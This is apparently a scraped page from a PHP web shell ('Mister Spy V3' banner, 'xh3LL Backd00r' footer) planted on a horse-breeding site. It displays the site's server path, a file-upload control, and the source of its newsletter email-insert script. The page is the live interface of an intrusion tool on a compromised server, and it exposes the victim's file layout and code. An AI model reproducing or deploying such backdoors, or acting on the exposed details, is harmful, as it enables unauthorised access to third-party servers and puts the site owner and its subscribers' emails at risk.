Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/espanol/
Upload File :
Current File : /home/caballoscriollos/public_html/espanol/email_newsletter_analiza.php

<?
require_once('../Connections/cnx.php'); 
require_once('../funcs.php'); 
require_once('inc_config.php'); 

if(isset($_POST['email']) && $_POST['email']!="")
{

  $insertSQL = sprintf("INSERT INTO emails_newsletter (email) VALUES (%s)",
                       GetSQLValueString($_POST['email'], "text"));

  mysql_select_db($database_cnx, $cnx);
  $Result1 = mysql_query($insertSQL, $cnx) or die(mysql_error());
    
  $insertGoTo = "email_newsletter_gracias.php";
  if (isset($_SERVER['QUERY_STRING'])) {
    $insertGoTo .= (strpos($insertGoTo, '?')) ? "&" : "?";
    $insertGoTo .= $_SERVER['QUERY_STRING'];
  }
  header(sprintf("Location: %s", $insertGoTo));
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat